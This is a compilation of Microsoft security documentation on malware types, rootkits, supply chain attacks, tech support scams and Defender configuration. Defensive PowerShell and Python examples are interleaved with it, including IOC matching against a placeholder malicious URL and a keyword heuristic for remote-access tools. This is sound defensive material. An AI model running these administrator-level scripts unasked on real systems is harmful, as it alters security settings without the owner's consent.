Whenever necessary, log in as an administrator to install apps or make configuration
changes that require admin privileges.

Read about creating user accounts and giving administrator privileges
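The following PowerShell is an added example, not part of the original page. It reports whether the current session holds an administrator token, reads the registry values behind the UAC behaviour described above, and creates a standard (non-administrator) account for everyday use. The account name is an assumption; the local-account cmdlets need Windows PowerShell 5.1, and the account-creation step needs an elevated session.

```powershell
# Added example (not from the Microsoft page). Windows PowerShell 5.1, run once elevated.

# 1. Is this session already running with administrator rights?
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal($identity)
$isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
"Current user: $($identity.Name)   Elevated admin token: $isAdmin"

# 2. UAC configuration (the registry values behind the Local Security Policy settings)
$uac = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
[pscustomobject]@{
    EnableLUA                  = $uac.EnableLUA                  # 1 = UAC on
    ConsentPromptBehaviorAdmin = $uac.ConsentPromptBehaviorAdmin # 0 = elevate silently, 2 = consent on secure desktop, 5 = default
    PromptOnSecureDesktop      = $uac.PromptOnSecureDesktop      # 1 = prompt can't be overlaid by other windows
} | Format-List
if ($uac.EnableLUA -ne 1 -or $uac.ConsentPromptBehaviorAdmin -eq 0) {
    Write-Warning 'UAC is off or set to elevate silently: malware run by an admin user gets full rights with no prompt.'
}

# 3. Create the everyday standard account: a member of Users only, never Administrators
$name = 'daily'   # assumption
if (-not (Get-LocalUser -Name $name -ErrorAction SilentlyContinue)) {
    $pw = Read-Host -AsSecureString "Password for $name"
    New-LocalUser -Name $name -Password $pw -FullName 'Daily use (standard user)' | Out-Null
    Add-LocalGroupMember -Group 'Users' -Member $name
}

# 4. Verify: the new account must not appear here
Get-LocalGroupMember -Group 'Administrators' | Select-Object Name, PrincipalSource
```

Step 2 is the check that matters for the UAC caveat in the text: even with a separate admin account, ConsentPromptBehaviorAdmin set to 0 means an elevation request from malware is granted without the user ever seeing a prompt.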

Other safety tips


To further ensure that data is protected from malware and other threats:

Back up files. Follow the 3-2-1 rule: make 3 copies, store in at least 2 locations, with
at least 1 offline copy. Use OneDrive for reliable cloud-based copies that allow
access to files from multiple devices and help recover damaged or lost files,
including files locked by ransomware.

Be wary when connecting to public Wi-Fi hotspots, particularly those that don't
require authentication.

Use strong passwords and enable multi-factor authentication.

Don't use untrusted devices to log on to email, social media, and corporate
accounts.

Avoid downloading or running older apps. Some of these apps might have
vulnerabilities. Also, older Office 2003 file formats (.doc, .pps, and .xls) allow
macros to run, which can be a security risk.

Software solutions
Microsoft provides comprehensive security capabilities that help protect against threats.
We recommend:

Automatic Microsoft updates keep software up to date to get the latest
protections.

Microsoft Edge browser protects against threats such as ransomware by
preventing exploit kits from running. By using Windows Defender SmartScreen,
Microsoft Edge blocks access to malicious websites.

Microsoft Defender Antivirus is built into Windows and helps provide real-time
protection against viruses, malware, and other attacks.

Microsoft Safety Scanner helps remove malicious software from computers. NOTE:
This tool doesn't replace your antimalware product.

Microsoft Defender is the simple way to protect your digital life and all of your
devices. It's included as part of your Microsoft 365 Family, or Personal, subscription
at no extra cost.

Use Zero Trust


Businesses should move to a Zero Trust security strategy. Zero Trust isn't a product or a
service, but an approach in designing and implementing the following set of security
principles:

Verify explicitly
Use least privilege access
Assume breach

Software solutions for business


Microsoft Defender for Business is a security solution designed especially for the
small- and medium-sized business (up to 300 employees). With this endpoint
security solution, your company's devices are better protected from ransomware,
malware, phishing, and other threats.

Microsoft Exchange Online Protection (EOP) offers enterprise-class reliability and
protection against spam and malware, while maintaining access to email during
and after emergencies.

Microsoft Defender for Office 365 includes machine learning capabilities that block
dangerous emails, including millions of emails carrying ransomware downloaders.

OneDrive for Business can back up files, which you would then use to restore
files in the event of an infection.

Microsoft Defender for Endpoint provides comprehensive endpoint protection,
detection, and response capabilities to help prevent ransomware. In the event of a
breach, Microsoft Defender for Endpoint alerts security operations teams about
suspicious activities and automatically attempts to resolve the problem.

Windows Hello for Business replaces passwords with strong two-factor
authentication on your devices. This authentication consists of a new type of user
credential that is tied to a device and uses a biometric or PIN. It lets users
authenticate to an Active Directory or Azure Active Directory account.

What to do with a malware infection


Microsoft Defender for Endpoint antivirus capabilities help reduce the chances of
infection and automatically remove threats that it detects.

In case threat removal is unsuccessful, read about troubleshooting malware detection
and removal problems.



Rootkits
Article • 02/28/2024

Malware authors use rootkits to hide malware on your device, allowing malware to
persist as long as possible. A successful rootkit can potentially remain in place for years
if it's undetected. During this time, it steals information and resources.

How rootkits work


Rootkits intercept and change standard operating system processes. After a rootkit
infects a device, you can't trust any information that device reports about itself.

If you ask a device to list all of the programs that are running, the rootkit might
stealthily remove any programs it doesn't want you to know about. Rootkits are all
about hiding things. They want to hide both themselves and their malicious activity on a
device.

Many modern malware families use rootkits to try to avoid detection and removal,
including:

Alureon

Cutwail

Datrahere (Zacinlo)

Rustock

Sinowal

Sirefef

How to protect against rootkits


Like any other type of malware, the best way to avoid rootkits is to prevent them from
being installed in the first place.

Apply the latest updates to operating systems and apps.

Educate your employees so they can be wary of suspicious websites and emails.

Back up important files regularly. Use the 3-2-1 rule. Keep three backups of your
data, on two different storage types, and at least one backup offsite.

For more general tips, see prevent malware infection.

What if I think I have a rootkit on my device?


Microsoft security software includes many technologies designed specifically to remove
rootkits. If you think you have a rootkit, you might need an extra tool that helps you
boot to a known trusted environment.

Microsoft Defender Offline can be launched from the Windows Security app and has
the latest antimalware updates from Microsoft. It's designed to be used on devices that
aren't working correctly because of a possible malware infection.

System Guard in Windows 10 protects against rootkits and threats that affect system
integrity.
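An added example, not Microsoft's code: before acting on what a possibly compromised device reports about itself, confirm from an elevated PowerShell session that the boot-integrity features and Defender's own self-protection are actually on, and then hand the scan to Microsoft Defender Offline, which runs before the installed OS (and anything hiding in it) loads. The Start-MpWDOScan line is commented out because it reboots the device.

```powershell
# Added example (not from the Microsoft page). Run elevated on Windows 10/11.

# 1. Secure Boot (UEFI only; the cmdlet throws on legacy BIOS or when not elevated)
try   { "Secure Boot enabled      : $(Confirm-SecureBootUEFI)" }
catch { "Secure Boot enabled      : unknown ($($_.Exception.Message))" }

# 2. Virtualization-based security and the services that depend on it
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
$running = @($dg.SecurityServicesRunning)
[pscustomobject]@{
    VbsRunning              = ($dg.VirtualizationBasedSecurityStatus -eq 2)  # 0 off, 1 configured, 2 running
    CredentialGuard         = ($running -contains 1)
    MemoryIntegrityHVCI     = ($running -contains 2)
    SystemGuardSecureLaunch = ($running -contains 3)
} | Format-List

# 3. Defender's self-protection and engine state
$mp = Get-MpComputerStatus
"Tamper protection        : $($mp.IsTamperProtected)"
"Real-time protection     : $($mp.RealTimeProtectionEnabled)"
"Antimalware engine       : $($mp.AMEngineVersion)"
"Signatures last updated  : $($mp.AntivirusSignatureLastUpdated)"

# 4. If anything above is off, or you still suspect a rootkit, scan from outside
#    the running OS. This reboots the device into Microsoft Defender Offline.
# Start-MpWDOScan
```

None of these values should be taken as proof of a clean machine; as the text says, a successful rootkit controls what the device reports. They tell you whether the protections that make rootkits hard to plant were in place, which is what decides whether to continue with an online scan or go straight to the offline one.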

What if I can't remove a rootkit?


If the problem persists, we strongly recommend reinstalling the operating system and
security software. Then restore your data from a backup.



Supply chain attacks
Article • 02/28/2024

Supply chain attacks are an emerging threat that targets software developers and
suppliers. The goal is to access source code, build processes, or update mechanisms by
infecting legitimate apps to distribute malware.

How supply chain attacks work


Attackers hunt for insecure network protocols, unprotected server infrastructure, and
unsafe coding practices. They break in, change source code, and hide malware in build
and update processes.

Because software is built and released by trusted vendors, these apps and updates are
signed and certified. In software supply chain attacks, vendors are likely unaware that
their apps or updates are infected with malicious code when they're released to the
public. The malicious code then runs with the same trust and permissions as the app.

The number of potential victims is significant, given the popularity of some apps. A case
occurred where a free file compression app was poisoned and deployed to customers in
a country/region where it was the top utility app.

Types of supply chain attacks


Compromised software build tools or update infrastructure

Stolen code-signing certificates, or malicious apps signed with the identity of the
developer company

Compromised specialized code shipped into hardware or firmware components

Pre-installed malware on devices (cameras, USB, phones, etc.)

To learn more about supply chain attacks, read this blog post called attack inception:
compromised supply chain within a supply chain poses new risks .

How to protect against supply chain attacks


Deploy strong code integrity policies to allow only authorized apps to run.
Use endpoint detection and response solutions that can automatically detect and
remediate suspicious activities.

For software vendors and developers


Maintain a highly secure build and update infrastructure.
Immediately apply security patches for OS and software.
Implement mandatory integrity controls to ensure only trusted tools run.
Require multi-factor authentication for admins.

Build secure software updaters as part of the software development lifecycle.


Require TLS for update channels and implement certificate pinning.
Sign everything, including configuration files, scripts, XML files, and packages.
Check digital signatures before applying an update, and don't let the software
updater accept generic input or commands from the update channel.

Develop an incident response process for supply chain attacks.


Disclose supply chain incidents and notify customers with accurate and timely
information.
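An added example, not the page's code and not any vendor's updater: the signature and pinning advice above expressed as the check an updater should run on a downloaded package before executing it. A valid Authenticode signature alone is not enough, because any publisher can hold a valid certificate; the updater must also pin the signer it expects. The package path and thumbprint are placeholders (assumptions); Get-AuthenticodeSignature is the standard Windows cmdlet.

```powershell
# Added example (not from the Microsoft page). Path and thumbprint are placeholders.
$PackagePath        = 'C:\Updates\product-update.msi'
$ExpectedThumbprint = '0000000000000000000000000000000000000000'   # pin your release-signing certificate here

function Test-TrustedUpdate {
    param([string]$Path, [string]$Thumbprint)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }

    $sig = Get-AuthenticodeSignature -FilePath $Path
    # 'Valid' means the file hash matches the signature and the chain builds to a
    # trusted root. NotSigned, HashMismatch, NotTrusted and UnknownError all stop here.
    if ($sig.Status -ne 'Valid') {
        Write-Warning "$Path : signature status is $($sig.Status)"
        return $false
    }
    # Signed by *someone* is not the same as signed by *us*: pin the signer.
    if ($sig.SignerCertificate.Thumbprint -ne $Thumbprint) {
        Write-Warning "$Path : signed by '$($sig.SignerCertificate.Subject)', not the pinned certificate"
        return $false
    }
    return $true
}

if (Test-TrustedUpdate -Path $PackagePath -Thumbprint $ExpectedThumbprint) {
    # Only now hand the package to the installer. The arguments are fixed in code;
    # nothing from the update channel is passed through as a command.
    Start-Process -FilePath 'msiexec.exe' -ArgumentList @('/i', "`"$PackagePath`"", '/qn') -Wait
} else {
    Write-Error 'Update rejected: not installed.'
}
```

The fixed argument list is the "don't accept generic input and commands" bullet in code form: the update channel may deliver a file, never an instruction about how to run it.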

For more general tips on protecting your systems and devices, see prevent malware
infection.



Tech support scams
Article • 02/28/2024

Tech support scams are an industry-wide issue where scammers use scare tactics to trick
users into paying for unnecessary technical support services. These services supposedly
fix contrived device, platform, or software problems.

How tech support scams work


Scammers might call you directly on your phone and pretend to be representatives of a
software company. They might even spoof the caller ID so that it displays a legitimate
support phone number from a trusted company. They can then ask you to install
applications that give them remote access to your device. If the attackers use remote
access, these experienced actors can misrepresent normal system output as signs of
problems.

Scammers might also initiate contact by displaying fake error messages on websites you
visit, displaying support numbers and enticing you to call. They can also put your
browser on full screen and display pop-up messages that won't go away, essentially
locking your browser. These fake error messages aim to trick you into calling an
indicated technical support hotline. Microsoft error and warning messages never include
phone numbers.

When you engage with the scammers, they can offer fake solutions for your "problems"
and ask for payment in the form of a one-time fee or subscription to a purported
support service.

For more information, view known tech support scam numbers and popular web
scams.

How to protect against tech support scams


Share and implement the general tips on how to prevent malware infection.

It's also important to keep the following in mind:

Microsoft doesn't send unsolicited email messages or make unsolicited phone calls
to request personal or financial information, or to fix your computer.
Any communication with Microsoft has to be initiated by you.
Don't call the number in the pop-ups. Microsoft's error and warning messages
never include a phone number.
Download software only from official vendor websites or the Microsoft Store. Be
wary of downloading software from third-party sites, as some of them might have
been modified without the author's knowledge to bundle support scam malware
and other threats.
Use Microsoft Edge when browsing the internet. It blocks known support scam
sites using Windows Defender SmartScreen (which is also used by Internet
Explorer). Furthermore, Microsoft Edge can stop pop-up dialogue loops used by
these sites.
Enable Microsoft Defender Antivirus in Windows 10. It detects and removes known
support scam malware.

What to do if information has been given to a tech support person

Uninstall applications that scammers asked you to install. Consider resetting the
device to a factory state.
Run a full scan with Microsoft Defender Antivirus to remove any malware. Apply all
security updates as soon as they're available.
Change passwords.
Monitor for anomalous sign-in activity. Use Windows Firewall to block traffic to
services that you wouldn't normally access.
Contact your bank or other financial institutions if you paid them.

Reporting tech support scams


Help Microsoft stop scammers, whether they claim to be from Microsoft or from
another tech company, by reporting tech support scams:

www.microsoft.com/reportascam

You can also report any unsafe website that you suspect is a phishing website or
contains malicious content directly to Microsoft by filling out a Report an unsafe site
form or using built in web browser functionality.



Trojans
Article • 02/28/2024

Trojans are a common type of malware, which, unlike viruses, can't spread on their own.
This means they either have to be downloaded manually or another malware needs to
download and install them.

Trojans often use the same file names as real and legitimate apps. It's easy to
accidentally download a trojan thinking that it's a legitimate app.

How trojans work


Trojans can come in many different varieties, but generally they do the following tasks:

Download and install other malware, such as viruses or worms.

Use the infected device for click fraud.

Record keystrokes and websites visited.

Send information about the infected device to a malicious hacker including
passwords, sign-in details for websites, and browsing history.

Give a malicious hacker control over the infected device.

How to protect against trojans


Use the following free Microsoft software to detect and remove them:

Microsoft Defender Antivirus for Windows 10 and Windows 8.1, or Microsoft
Security Essentials for previous versions of Windows.

Microsoft Safety Scanner

For more general tips, see prevent malware infection.



Understanding malware & other threats
Article • 02/28/2024

Malware is a term used to describe malicious applications and code that can cause
damage and disrupt normal use of devices. Malware can allow unauthorized access, use
system resources, steal passwords, lock you out of your computer and ask for ransom,
and more.

Cybercriminals that distribute malware are often motivated by money and will use
infected computers to launch attacks, obtain banking credentials, collect information
that can be sold, sell access to computing resources, or extort payment from victims.

As criminals become more sophisticated with their attacks, Microsoft is here to help.
Windows 10 is the most secure version of Windows yet and includes many features to
help protect you whether you're at home, at work, or on the go. With Microsoft
Defender for Endpoint, businesses can stay protected with next-generation protection
and other security capabilities.

For good general tips, check out the prevent malware infection topic.

There are many types of malware, including:

Coin miners
Exploits and exploit kits
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms

Additional resources and information


Keep up with the latest malware news and research. Check out our Microsoft
security blogs and follow us on Twitter for the latest news, discoveries, and
protections.

Learn more about Windows security.


Learn how to deploy threat protection capabilities across Microsoft 365 E5.



Unwanted software
Article • 02/28/2024

Unwanted software is software that alters the Windows experience without your
consent or control. This can take the form of a modified browsing experience, lack of
control over downloads and installation, misleading messages, or unauthorized changes
to Windows settings.

How unwanted software works


Unwanted software can be introduced when a user searches for and downloads
applications from the internet. Some applications are software bundlers, which means
that they're packed with other applications. As a result, other programs can be
inadvertently installed when the original application is downloaded.

Here are some indications of unwanted software:

There are programs that you didn't install and that may be difficult to uninstall

Browser features or settings have changed, and you can't view or modify them

There are excessive messages about your device's health or about files and
programs

There are ads that can't be easily closed

Some indicators are harder to recognize because they're less disruptive, but are still
unwanted. For example, unwanted software can modify web pages to display specific
ads, monitor browsing activities, or remove control of the browser.

How to protect against unwanted software


To prevent unwanted software infection, download software only from official websites,
or from the Microsoft Store. Be wary of downloading software from third-party sites.

Use Microsoft Edge when browsing the internet. Microsoft Edge includes additional
protections that effectively block browser modifiers that can change your browser
settings. Microsoft Edge also blocks known websites hosting unwanted software using
Windows Defender SmartScreen (also used by Internet Explorer).

Enable Microsoft Defender Antivirus in Windows 10. It provides real-time protection
against threats and detects and removes known unwanted software.

Download Microsoft Security Essentials for real-time protection in Windows 7 or
Windows Vista.

For more general tips, see prevent malware infection.

What should I do if my device is infected?


If you suspect that you have unwanted software, you can submit files for analysis.

Some unwanted software adds uninstallation entries, which means that you can remove
them using Settings.

1. Select the Start button
2. Go to Settings > Apps > Apps & features.
3. Select the app you want to uninstall, then select Uninstall.

If you only recently noticed symptoms of unwanted software infection, consider sorting
the apps by install date, and then uninstall the most recent apps that you didn't install.

You may also need to remove browser add-ons in your browsers, such as Internet
Explorer, Firefox, or Chrome.
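An added example, not Microsoft's code, that serves two procedures in this section: the clean-up steps on the tech support scam page (remove what the scammer had you install, run a full scan, watch sign-in activity) and the advice above to find and uninstall the most recently installed apps you didn't choose. It turns on Defender's potentially unwanted application (PUA) blocking, lists installed programs newest first, shows what Defender has already flagged as PUA, summarises recent network and remote-desktop sign-ins, and starts a full scan. The keyword heuristic for remote-access-like names and the seven-day window are assumptions; run it in an elevated Windows PowerShell 5.1 session.

```powershell
# Added example (not from the Microsoft page). Run elevated, Windows PowerShell 5.1.

# 1. Block potentially unwanted applications outright (0 Disabled, 1 Enabled, 2 AuditMode)
if ((Get-MpPreference).PUAProtection -ne 1) { Set-MpPreference -PUAProtection Enabled }

# 2. Installed programs from the per-machine (64- and 32-bit) and per-user Uninstall
#    keys, newest first, so anything added during a "support session" is at the top
$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)
$apps = Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
    Where-Object { $_.DisplayName } |
    Select-Object DisplayName, Publisher, InstallDate, UninstallString,
        @{ n = 'RemoteAccessLike'; e = { $_.DisplayName -match 'remote|support|desktop|viewer' } }  # keyword heuristic (assumption)
$apps |
    Sort-Object { if ($_.InstallDate -match '^\d{8}$') { $_.InstallDate } else { '00000000' } } -Descending |
    Select-Object -First 15 DisplayName, Publisher, InstallDate, RemoteAccessLike |
    Format-Table -AutoSize
# Remove an entry with its UninstallString, or through Settings > Apps as the page describes.

# 3. What Defender has already classified as PUA (threat names start with "PUA:")
Get-MpThreat | Where-Object { $_.ThreatName -like 'PUA:*' } | Select-Object ThreatName, IsActive

# 4. Network and remote-desktop sign-ins in the last 7 days
#    (Security event 4624; LogonType 3 = network, 10 = RemoteInteractive/RDP)
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddDays(-7) } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Time      = $_.TimeCreated
            User      = $_.Properties[5].Value    # TargetUserName
            LogonType = $_.Properties[8].Value
            SourceIp  = $_.Properties[18].Value   # IpAddress
        }
    } |
    Where-Object { $_.LogonType -in 3, 10 } |
    Select-Object -First 20 | Format-Table -AutoSize

# 5. Full scan last; it takes a while
Start-MpScan -ScanType FullScan
```

Sorting by InstallDate is the same trick as sorting Settings > Apps by install date, but it also covers per-user installs under HKCU, which is where a lot of bundled and scammer-installed software lands because it needs no elevation.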

In case threat removal is unsuccessful, read about troubleshooting malware detection
and removal problems.



Worms
Article • 02/28/2024

A worm is a type of malware that can copy itself and often spreads through a network
by exploiting security vulnerabilities. It can spread through email attachments, text
messages, file-sharing programs, social networking sites, network shares, removable
drives, and software vulnerabilities.

How worms work


Worms represent a large category of malware. Different worms use different methods to
infect devices. Depending on the variant, they can steal sensitive information, change
security settings, send information to malicious hackers, stop users from accessing files,
and other malicious activities.

Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have
consistently remained at the top of the list of malware that infects users running
Microsoft software. Although these worms share some commonalities, it's interesting to
note that they also have distinct characteristics.

Jenxcus not only infects removable drives but can also act as a backdoor that
connects back to its server. This threat typically gets into a device through a drive-by
download attack, meaning it's installed when users merely visit a compromised web page.

Gamarue typically arrives through spam campaigns, exploits, downloaders, social
networking sites, and removable drives. When Gamarue infects a device, it
becomes a distribution channel for other malware. We've seen it distribute other
malware such as info stealers, spammers, clickers, downloaders, and rogues.

Bondat typically arrives through fictitious Nullsoft Scriptable Install System (NSIS),
Java installers, and removable drives. When Bondat infects a system, it gathers
information about the machine such as device name, Globally Unique Identifier
(GUID), and OS build. It then sends that information to a remote server.

Both Bondat and Gamarue have clever ways of obscuring themselves to evade
detection. By hiding what they're doing, they try to avoid detection by security software.

WannaCrypt also deserves a mention here. Unlike older worms that often
spread just because they could, modern worms often spread to drop a payload
(like ransomware).

[Figure: how a worm can quickly spread through a shared USB drive]

How to protect against worms


Enable Microsoft Defender Antivirus in Windows 10. It provides real-time protection
against threats and detects and removes known worms and other malware.

Download Microsoft Security Essentials for real-time protection in Windows 7 or
Windows Vista.

In case threat removal is unsuccessful, read about troubleshooting malware detection
and removal problems.

For more general tips, see prevent malware infection.



Understand threat intelligence concepts
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

7 Note

Try our new APIs using MS Graph security API. Find out more at: Use the
Microsoft Graph security API - Microsoft Graph | Microsoft Learn.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Multiple complex malicious events, attributes, and contextual information comprise
advanced cybersecurity attacks. Identifying and deciding which of these activities qualify
as suspicious can be a challenging task. Your knowledge of known attributes and
abnormal activities specific to your industry is fundamental in knowing when to call an
observed behavior as suspicious.

With Microsoft Defender XDR, you can create custom threat alerts that can help you
keep track of possible attack activities in your organization. You can flag suspicious
events to piece together clues and possibly stop an attack chain. These custom threat
alerts will only appear in your organization and will flag events that you set it to track.

Before creating custom threat alerts, it's important to know the concepts behind alert
definitions and indicators of compromise (IOCs) and the relationship between them.

Alert definitions

Alert definitions are contextual attributes that can be used collectively to identify early clues of a possible cybersecurity attack. These indicators are typically a combination of activities, characteristics, and actions taken by an attacker to successfully achieve the objective of an attack. Monitoring these combinations of attributes is critical in gaining a vantage point against attacks and possibly interfering with the chain of events before an attacker's objective is reached.

Indicators of compromise (IOC)

IOCs are individually known malicious events that indicate that a network or device has already been breached. Unlike alert definitions, these indicators are considered evidence of a breach. They're often seen after an attack has already been carried out and the objective has been reached, such as exfiltration. Keeping track of IOCs is also important during forensic investigations. Although it might not be possible to intervene in the attack chain at that point, gathering these indicators can be useful in creating better defenses against possible future attacks.

Relationship between alert definitions and IOCs

In the context of Microsoft Defender XDR and Microsoft Defender for Endpoint, alert definitions are containers for IOCs and define the alert, including the metadata that is raised for a specific IOC match. Various metadata is provided as part of the alert definition: the alert definition name, the attack severity, and a description, along with other options.

Each IOC defines the concrete detection logic based on its type, value, and action, which determines how it's matched. It's bound to a specific alert definition that defines how a detection is displayed as an alert on the Microsoft Defender XDR console.

Here's an example of an IOC:

Type: Sha1
Value: 92cfceb39d57d914ed8b14d0e37643de0797ae56
Action: Equals

IOCs have a many-to-one relationship with alert definitions such that an alert definition
can have many IOCs that correspond to it.
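The following is an added example (not code from this article or from Microsoft) that models the relationship just described: an alert definition carrying metadata and many IOCs, each IOC matching an observed event by its type, value, and action. The class and function names (Indicator, AlertDefinition, match_event) and the sample events are assumptions constructed for illustration; the SHA-1 value is the one quoted above.

```python
"""Model of the alert-definition / IOC relationship described above.

Added example, not Microsoft code: the class and field names (Indicator,
AlertDefinition, match_event) are assumptions chosen for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Indicator:
    """One IOC: concrete detection logic made of a type, a value and an action."""
    ioc_type: str   # attribute the event reports, e.g. "Sha1", "Ip", "Url"
    value: str
    action: str     # "Equals" or "Contains"

    def matches(self, event: Dict[str, str]) -> bool:
        observed = event.get(self.ioc_type)
        if observed is None:
            return False
        if self.action == "Equals":
            return observed.lower() == self.value.lower()
        if self.action == "Contains":
            return self.value.lower() in observed.lower()
        raise ValueError(f"unsupported action: {self.action}")


@dataclass
class AlertDefinition:
    """Container for many IOCs plus the metadata raised on a match."""
    name: str
    severity: str
    description: str
    indicators: List[Indicator] = field(default_factory=list)


def match_event(definitions: List[AlertDefinition],
                event: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (definition name, severity, IOC value) for every IOC that matched."""
    hits = []
    for definition in definitions:
        for ioc in definition.indicators:
            if ioc.matches(event):
                hits.append((definition.name, definition.severity, ioc.value))
    return hits


# Constructed sample: the SHA-1 IOC quoted on the page plus a hypothetical URL IOC.
SAMPLE_DEFINITIONS = [
    AlertDefinition(
        name="Known malicious binary",
        severity="High",
        description="File hash matched a tracked indicator",
        indicators=[Indicator("Sha1", "92cfceb39d57d914ed8b14d0e37643de0797ae56", "Equals")],
    ),
    AlertDefinition(
        name="Suspicious download site",
        severity="Medium",
        description="Connection to a tracked hostname",
        indicators=[Indicator("Url", "example-bad-host.test", "Contains")],
    ),
]

# Constructed events shaped like the attributes an endpoint would report.
SAMPLE_EVENTS = [
    {"Sha1": "92CFCEB39D57D914ED8B14D0E37643DE0797AE56", "FileName": "a.exe"},
    {"Url": "https://example-bad-host.test/payload"},
    {"Sha1": "0000000000000000000000000000000000000000"},
]


def run_sample() -> List[List[Tuple[str, str, str]]]:
    """Evaluate each constructed event against all definitions."""
    return [match_event(SAMPLE_DEFINITIONS, event) for event in SAMPLE_EVENTS]
```

Hash comparison is case-insensitive because endpoints and feeds disagree on hex casing; the third event shows that an unknown hash produces no alert, which is the many-to-one relationship in practice: one definition, many IOCs, an alert only when some IOC matches.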

Related topics
Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn

Manage indicators

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Configure Conditional Access in
Microsoft Defender for Endpoint
Article • 10/25/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This section guides you through all the steps you need to take to properly implement
Conditional Access.

Before you begin

Warning

Microsoft Entra registered devices are not supported in this scenario. Only Intune enrolled devices are supported.

You need to make sure that all your devices are enrolled in Intune. You can use any of
the following options to enroll devices in Intune:

IT Admin: For more information on how to enable auto-enrollment, see Windows Enrollment.
End-user: For more information on how to enroll your Windows 10 and Windows 11 device in Intune, see Enroll your Windows 10 device in Intune.
End-user alternative: For more information on joining a Microsoft Entra domain, see How to: Plan your Microsoft Entra join implementation.

There are steps you'll need to take in Microsoft Defender XDR, the Intune portal, and
Microsoft Entra admin center.

It's important to note the required roles to access these portals and implement Conditional Access:

Microsoft Defender XDR - You'll need to sign in to the portal with a global administrator role to turn on the integration.
Intune - You'll need to sign in to the portal with security administrator rights with management permissions.
Microsoft Entra admin center - You'll need to sign in as a global administrator, security administrator, or Conditional Access administrator.

Note

You'll need a Microsoft Intune environment, with Intune managed and Microsoft Entra joined Windows 10 and Windows 11 devices.

Take the following steps to enable Conditional Access:

Step 1: Turn on the Microsoft Intune connection from Microsoft Defender XDR
Step 2: Turn on the Defender for Endpoint integration in Intune
Step 3: Create the compliance policy in Intune
Step 4: Assign the policy
Step 5: Create a Microsoft Entra Conditional Access policy

Step 1: Turn on the Microsoft Intune connection

1. In the navigation pane, select Settings > Endpoints > General > Advanced features > Microsoft Intune connection.
2. Toggle the Microsoft Intune setting to On.
3. Click Save preferences.

Step 2: Turn on the Defender for Endpoint integration in Intune

1. Sign in to the Intune portal.
2. Select Endpoint Security > Microsoft Defender for Endpoint.
3. Set Connect Windows 10.0.15063+ devices to Microsoft Defender Advanced Threat Protection to On.
4. Click Save.

Step 3: Create the compliance policy in Intune

1. In the Azure portal, select All services, filter on Intune, and select Microsoft Intune.
2. Select Device compliance > Policies > Create policy.

3. Enter a Name and Description.

4. In Platform, select Windows 10 and later.

5. In the Device Health settings, set Require the device to be at or under the Device Threat Level to your preferred level:

Secured: This level is the most secure. The device cannot have any existing threats and still access company resources. If any threats are found, the device is evaluated as noncompliant.
Low: The device is compliant if only low-level threats exist. Devices with medium or high threat levels are not compliant.
Medium: The device is compliant if the threats found on the device are low or medium. If high-level threats are detected, the device is determined as noncompliant.
High: This level is the least secure, and allows all threat levels. So devices with high, medium, or low threat levels are considered compliant.

6. Select OK, and Create to save your changes (and create the policy).

Step 4: Assign the policy

1. In the Azure portal, select All services, filter on Intune, and select Microsoft Intune.
2. Select Device compliance > Policies > select your Microsoft Defender for Endpoint compliance policy.
3. Select Assignments.
4. Include or exclude your Microsoft Entra groups to assign them the policy.
5. To deploy the policy to the groups, select Save. The user devices targeted by the policy are evaluated for compliance.

Step 5: Create a Microsoft Entra Conditional Access policy

1. In the Azure portal, open Microsoft Entra ID > Conditional Access > New policy.

2. Enter a policy Name, and select Users and groups. Use the Include or Exclude
options to add your groups for the policy, and select Done.

3. Select Cloud apps, and choose which apps to protect. For example, choose Select
apps, and select Office 365 SharePoint Online and Office 365 Exchange Online.
Select Done to save your changes.

4. Select Conditions > Client apps to apply the policy to apps and browsers. For
example, select Yes, and then enable Browser and Mobile apps and desktop
clients. Select Done to save your changes.

5. Select Grant to apply Conditional Access based on device compliance. For example, select Grant access > Require device to be marked as compliant. Choose Select to save your changes.

6. Select Enable policy, and then Create to save your changes.

Note

You can use the Microsoft Defender for Endpoint app along with the Approved Client app, App Protection policy and Compliant Device (Require device to be marked as compliant) controls in Microsoft Entra Conditional Access policies. There's no exclusion required for the Microsoft Defender for Endpoint app while setting up Conditional Access. Although Microsoft Defender for Endpoint on Android & iOS (App ID - dd47d17a-3194-4d86-bfd5-c6ae6f5651e3) isn't an approved app, it is able to report device security posture in all three grant permissions.

However, internally Defender requests the MSGraph/User.read scope and the Intune Tunnel scope (in Defender+Tunnel scenarios), so these scopes must be excluded*. To exclude the MSGraph/User.read scope, any one cloud app can be excluded. To exclude the Tunnel scope, you need to exclude 'Microsoft Tunnel Gateway'. These permissions and exclusions enable the flow of compliance information to Conditional Access.

*Please note that applying a Conditional Access policy to All Cloud Apps could inadvertently block user access in some cases, so it's not recommended. Read more about Conditional Access policies on Cloud Apps.

For more information, see Enforce compliance for Microsoft Defender for Endpoint with
Conditional Access in Intune.



Configure Microsoft Defender for Cloud
Apps in Microsoft Defender for
Endpoint
